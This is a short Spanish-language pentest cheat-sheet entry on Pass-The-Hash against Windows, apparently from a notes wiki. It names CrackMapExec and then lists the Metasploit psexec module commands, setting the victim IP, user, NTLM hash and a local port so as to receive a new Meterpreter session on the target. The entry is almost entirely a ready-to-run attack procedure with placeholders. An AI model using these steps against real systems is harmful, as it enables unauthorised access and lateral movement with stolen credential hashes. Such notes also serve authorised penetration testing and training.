Pass-The-Hash (Windows)
Explotación con CrackMapExec (Necesitamos solo el hash NTLM)
Explotación con Psexec en Metasploit (Necesitamos el LM y NTLM hash)
use exploit/windows/smb/psexec
set LPORT <Puerto libre local> (Ya que recibiremos otra sesión de meterpreter nueva)
set RHOSTS <IP vícitma>
set SMBUser <user>
set SMBPass <hash NTLM>
set target Native\ upload
exploitÚltima actualización